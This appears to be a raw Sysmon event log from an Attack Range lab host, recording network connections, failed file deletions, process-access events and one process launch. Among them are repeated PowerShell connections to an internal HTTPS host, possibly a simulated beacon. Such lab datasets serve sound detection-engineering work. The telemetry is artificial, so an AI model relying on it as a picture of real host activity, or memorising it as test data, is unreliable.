354300x800000000000000035343235Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:10.021{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52525-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035343234Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:44.032{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=989955B8160A0398D6ADBB650DB90E3B,SHA256=823CF03DFAE8B7AB687664B81DE48D3E9FAAF533BB10D8F6A1BDEF30F95C2A09,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343239Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:45.983{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1DFADBAD934C14F7B49CDB8E2516589D,SHA256=C31BD7A86F1953376336DE75B9A6B3E0A44D0717E98CDEAE2B60B73657AE0332,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343238Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:11.151{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52526-false10.0.1.12-8000- 23542300x800000000000000035343240Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:46.999{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5DF187A8F27F6C57106D6CCBCC940BEE,SHA256=A23FEF1D8BD1D13ABD0F3890A4B5FD8E929CFFD50E55D46E569DC1AF101CA292,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343241Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:48.000{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE8369D9BBDC10D1BDC30DAB6B83A6F4,SHA256=9D5A3754ED16CAAA67A95AB0CFDC63AC24ACE17F40C354C127C237F87E0A5EA8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343244Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:15.036{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52527-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035343243Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:49.066{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=97676FE5885539AE51217A9BCB4CF4C6,SHA256=7E401B75DD59FE0EDE20D10FEBC2F867DCD613F76A854A2D7D903E1F4CF6BBD6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343242Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:49.016{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9DF3CEC5CCB3938FC8FE74DFF58AA46E,SHA256=972CB3AC2CC7A92BED831379518BC2AE385687A49295CBB6063E1EE17B1987B7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343245Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:50.031{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=31E0DC1C7D720D3E2045DEFE9F227E24,SHA256=135E9F95CA071F54428E4539E07057D25525E797AF2E2525F68395EBEC56C795,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343247Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:17.069{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52528-false10.0.1.12-8000- 23542300x800000000000000035343246Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:51.046{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=05819398CA32815929A14E05C8B03B1E,SHA256=98D295D8F96BE9BACCB4340C808A7667B8499223270E47BDBF0F8421A5F7F067,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343248Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:52.063{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=824F35DA1A6F1B03116387396C703B29,SHA256=73CE3E4270F1A28625ED3783DAEBF3E220F0F3300E4F97D2C1559EB607A93F2C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343250Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:53.082{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=70F240A36C975C05E7AFC1B6188094CC,SHA256=5381EF175DBC83B4AF562F9D91CB03A4934A7A0C3D845720CFD82D1D87F31A5C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343249Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:53.064{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=C448F625C42B5B25646D628D867A37E3,SHA256=48F652C5CED2CBF58659600BE25B8DA8F574F9E059F6136130E087B3CDBBAC45,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343252Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:19.050{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52529-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035343251Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:54.098{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8D4CA30100C7D2E854AD27DAD4C8D497,SHA256=CF912B046025193F18B68E36A025E0D87963E6244776D1B6402D95B93F36E047,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343253Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:55.143{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3C888BFD6A160C0BF373AFCAD2CBF569,SHA256=08CE9CD38B95289C726D1E2F706C97CA4916033E522DB1980A937B8E48E2C457,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343254Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:56.161{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B15DD25CA14EB66311B120F0091374D3,SHA256=821A480CAFC6667A03C0DEA62C685A3C1AD697713250E9134C91724F6E064AF2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343257Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:22.100{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52530-false10.0.1.12-8000- 23542300x800000000000000035343256Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:57.180{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1F4723B5EAEA9D73D294921D98AC99DB,SHA256=E532A8C2A401B186A9CB8BDAC5F12E5B18D920A5F9304038E7EBFC224E39C620,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343255Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:57.127{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=B33B248AFFC4BE6B22DBEA2F84FC73C9,SHA256=779F3BBC4B150A3C0F07B72B42C4A9294756C5B54D46E2C676D68303AE5C79A4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343259Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:23.064{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52531-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035343258Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:58.195{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D921B27A7AADCEB8A363030D4A8B699,SHA256=DB415E8D50281E237E11ACDE6A062BEFF90FCBBE6691EE07BC1A45F179D6BDD7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343260Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:59.209{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=97912CCED34A78F1CCD32C7B098D410E,SHA256=53FB7F75553E33D6237F927CF167DA622F57A80A5A60E08F6EF12499FCB9D337,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343261Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:00.292{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7170DB558ACE6735D9E014C665AB3962,SHA256=7E5B169D060B2C0F3FC72999FB15052A9833E8F7E19CA2263DE75E9959519EF6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343265Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:27.112{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52533-false10.0.1.12-8000- 354300x800000000000000035343264Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:27.081{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52532-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035343263Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:01.339{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FC42EB812CB0711C1B4114DF80211DC3,SHA256=355AFAE514D086A12F687D9428715D5580EF7B7467649C60AE59B423E976E85E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343262Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:01.258{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=0C72E0A76DB24B3E4B69014788CC4E92,SHA256=D8C4187F10217E4AE89973A707EBBC8B2790F76DAA9131F1A088FF9AA567E8AB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343266Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:02.378{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=237AF84BC2B4A08FD84052F1651BB57B,SHA256=94DB6663D42D73769FA7BF9C6F704315CA1B62D689A05D4B2A8B72A79BE88538,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343267Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:03.393{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D4B7E0FCFCB58492F36F3236703CD220,SHA256=944442640D5B616C4E9C0EEB4BD7DFD4B1887FEDBCA6FAFFB1697A840692E447,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035343285Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:04.762{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-73E4-613B-54B4-03000000C801}5064C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343284Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:04.762{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343283Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:04.762{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343282Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:04.762{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343281Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:04.762{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343280Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:04.762{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-73E4-613B-54B4-03000000C801}5064C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035343279Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:04.762{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-73E4-613B-54B4-03000000C801}5064C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035343278Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:04.745{B81B27B7-73E4-613B-54B4-03000000C801}5064C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035343277Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:04.393{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=857E1ED8BB61CE7D22B187C2C14C93E7,SHA256=AC476F921202A1E3095139A8E6705D3156B783479A61D4EB1EAAE4428083775B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035343276Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:04.240{B81B27B7-73E4-613B-53B4-03000000C801}63201756C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343275Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:04.062{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-73E4-613B-53B4-03000000C801}6320C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343274Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:04.062{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343273Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 